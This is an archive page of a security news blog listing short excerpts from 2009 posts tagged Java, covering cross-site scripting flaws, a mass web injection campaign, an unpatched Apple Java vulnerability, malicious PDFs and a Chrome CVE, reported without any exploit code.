Security Hero Rotating Header Image

Posts Tagged ‘Java’

BASE – 3 Persistent Cross Site Scripting Vulnerabilities

BASE – 3 Persistent Cross Site Scripting Vulnerabilities Posted by Jabra on May 30 BASE, a well known Snort Frontend has 3 Persistent Cross Site Scripting Vulnerabilities. For those who don’t know, Cross-Site Scripting allows the attacker to inject Javascript to modify the functionality of the webpages. Since this vulnerability exists in BASE, this allows [...]

CIS releases security configuration standards for iPhone

CIS releases security configuration standards for iPhone The nonprofit Center for Internet Security (CIS) this week released free guidelines that can help organizations develop custom policies related to use of the increasingly popular mobile device, said Blake Frantz, CTO of the CIS. The benchmarks inform users about the security configuration settings available to them on [...]

Mass Injection Compromises More than Twenty-Thousand Web Sites

Malicious Web Site / Malicious Code: Mass Injection Compromises More than Twenty-Thousand Web Sites Websense Security Labs™ Threatseeker™ Network has detected that a large compromise of legitimate Web sites is currently taking place around the globe. Thousands of legitimate Web sites have been discovered to be injected with malicious Javascript, obfuscated code that leads to [...]

FFSpy, a firefox malware PoC

Re: FFSpy, a firefox malware PoC Posted by FUDder Guy on May 25 > From: saphex <saphex_at_gmail.com> > Date: Wed, 20 May 2009 01:42:16 +0100 > > I think this is interesting, myf00.net/?p=18 > So, how does someone manage to edit the overlay file? Are they going to use some javascript from a malicious website [...]

D-Link’s CAPTCHA – A Big Question on Security

D-Links CAPTCHA V A Big Question on Security As per the security report, it took nearly a week for the researchers at SourceSec to detect a flaw in the implementation of CAPTCHA (completely automated public Turing test to tell humans and computers apart) by D-Link in its routers, which was originally meant to stop the [...]

Analyzing malicious PDF documents, (Sun, May 24th)

Analyzing malicious PDF documents, (Sun, May 24th) As we announced in a recent ISC diary, Adobe is changing its patching model and strategy, but it seems still JavaScript will be enabled by default in Adobe Acrobat and Reader. As a consequence, I foreshadow more PDF vulnerabilities, exploits and attacks in the near future (let’s hope [...]

Patching and Apple – Java issue, (Fri, May 22nd)

Patching and Apple – Java issue, (Fri, May 22nd) At the other end of the spectrum is Apple. There is a java issue (CVE-2008-5353)which was reported to Sun and fixed by Sun back in December. For some reason the fix for this was not included in the recent security updates all Mac users would have [...]

Google Accelerates Chrome 2 For Windows

Google Accelerates Chrome 2 For Windows Google’s Chrome browser got faster Thursday with the release of Chrome 2.0.172.28. No, that’s not an IP address. While Microsoft prefers to hide incremental update designations in Internet Explorer to confound hackers, Google wants everyone to know that its engineers are upgrading everything as fast as they can. At [...]

Angered by Apple delay, hacker posts Mac Java attack code

Angered by Apple delay, hacker posts Mac Java attack code In an effort to draw attention to a long-standing security problem in Apple’s Mac OS X operating system, a security researcher has posted attack code that exploits the flaw. The software, which could be used by hackers to run an unauthorized system on a Mac, [...]

Sun Java System Communications Express ‘search.xml’ Cross Site Scripting Vulnerability

Vuln: Sun Java System Communications Express ‘search.xml’ Cross Site Scripting Vulnerability Sun Java System Communications Express ‘search.xml’ Cross Site Scripting Vulnerability URL: http://www.securityfocus.com/bid/34154

Java, Serial, and an Apple , (Wed, May 20th)

Breakfast: Java, Serial, and an Apple , (Wed, May 20th) According to Julien Tinnes in the CR0 Blog, it appears that Apple’s recent security update failed to fix a Java flaw that was reported to Sun back in August 2008 and patched by Sun way back in December 2008. The upshot: according to the blog [...]

Web Toolz, (Wed, May 20th)

Web Toolz, (Wed, May 20th) Ok, a couple of web app testing tools have been recently updated/released: My buddies Kevin Johnson, Justin Searle, and the rest of the SamuraiWTF dev team have released version 0.6 of the SamuraiWTF live web testing framework CD. From the announcement: The SamuraiWTF project team is proud to announce the [...]

concept to urge Apple action

Researcher publishes Java proof-of-concept to urge Apple action Calling Apple’s patching process “opaque,” a security researcher has decided that publishing a proof-of-concept exploit is the best way to force the computing giant to fix a months-old flaw. URL: http://feedproxy.google.com/~r/SCMagazineHome/~3/shT93FcubG4/

Gumblar Exploit is the Most Prevalent Web Threat

Gumblar Exploit is the Most Prevalent Web Threat Malware analysts from security vendor Sophos warn that the number of pages infected with the Gumblar malcious script has recently sky-rocketed, putting the exploit at the top of the list of Web threats. The impact of the previous record setter Mal/Iframe-F now dwarfs in comparison. According to [...]

1598 (chrome)

CVE-2009-1598 (chrome) Google Chrome executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits [...]

Bad Behavior has blocked 405 access attempts in the last 7 days.